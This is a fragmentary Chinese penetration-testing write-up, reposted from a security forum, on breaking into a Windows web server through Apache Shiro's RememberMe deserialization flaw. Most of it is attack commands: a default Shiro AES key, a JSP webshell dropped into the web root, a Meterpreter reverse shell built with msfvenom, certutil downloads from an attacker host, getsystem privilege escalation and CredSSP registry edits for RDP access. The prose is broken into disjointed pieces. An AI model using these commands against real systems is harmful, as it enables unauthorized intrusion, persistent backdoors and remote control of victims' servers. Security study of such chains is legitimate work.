shiro框架在登录时,如果勾选了RememberMe的功能,关闭浏览器再次访问时便无需再次登录,此时cookie中会增加一个rememberMe字段,字段的值是这样处理的:序列化,AES加密,Base64加密。最终得到的值传到后端后,解码过程即为:Base64解码,AES解密,反序列化。
kPH+bIxk5D2deZiIxcaaaA==
rememberMe=deleteMe
字段。于是确认此处为shiro框架。whoami
dir
一下得到当前目录后,直接cd
到webapps目录下,发现只有一个默认ROOT的目录,cd进入后可以看到网站的文件cd xxx/webapps/ROOT && dir
echo ^<%eval request("cmd");%^>>yl_test.jsp
http://xxx/bcel.jsp
http://xxx/test/bcel.jsp
tasklist /svc
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=xxxx lport=1234 -f c >1234.c
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost xxx
set lport 1234
run
certutil.exe -urlcache -split -f http://xxx:1111/test.txt
certutil.exe -urlcache -split -f http://xxx:1111/test.exe
systeminfo
getsystem
提权netstat -ano | findstr "3389"
tasklist /svc
netstat -ano | findstr "2428"
New-Item -Path HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name CredSSP -Force
New-Item -Path HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP -Name Parameters -Force
Get-Item -Path HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters | New-ItemProperty -Name AllowEncryptionOracle -Value 2 -PropertyType DWORD -Force
https://su18.org/post/shiro-5/https://help.aliyun.com/document_detail/71931.html
文章来源:先知社区(御林安全之落花)
原文地址:https://xz.aliyun.com/t/11201
黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!
如侵权请私聊我们删文
END
多一个点在看多一条小鱼干